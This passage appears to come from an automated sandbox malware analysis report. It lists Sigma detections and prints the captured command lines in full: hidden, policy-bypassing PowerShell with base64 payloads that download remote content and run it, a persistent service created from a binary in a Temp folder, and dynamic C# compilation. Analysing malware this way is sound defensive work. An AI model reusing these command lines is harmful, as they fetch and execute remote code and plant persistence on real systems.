0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
      Sigma detected: Suspicious New Service Creation
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7888, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 8060, ProcessName: sc.exe
      Sigma detected: Suspicious PowerShell Encoded Command Patterns
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , CommandLine: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , CommandLine|base64offset|contains: F^,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8632, ParentProcessName: cmd.exe, ProcessCommandLine: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , ProcessId: 8708, ProcessName: powershell.exe
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , CommandLine: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , CommandLine|base64offset|contains: F^,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8632, ParentProcessName: cmd.exe, ProcessCommandLine: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , ProcessId: 8708, ProcessName: powershell.exe
      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8708, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline", ProcessId: 8980, ProcessName: csc.exe
      Sigma detected: Suspicious Execution of Powershell with Base64
      Source: Process startedAuthor: frack113: Data: Command: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , CommandLine: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , CommandLine|base64offset|contains: F^,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8632, ParentProcessName: cmd.exe, ProcessCommandLine: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , ProcessId: 8708, ProcessName: powershell.exe
      Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , CommandLine: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , CommandLine|base64offset|contains: F^,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "s^t^aRT /MI^N "" pOWe^Rs^heL^L -W hId^den -n^o^lOg^o -n^oP -E^P By^Pass -e^nc^oDE^D^cOm^m^a^n^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA"" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8632, ParentProcessName: cmd.exe, ProcessCommandLine: pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" , ProcessId: 8708, ProcessName: powershell.exe
      Sigma detected: Dynamic CSharp Compile Artefact
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8708, TargetFilename: C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline
      Sigma detected: Net.exe Execution
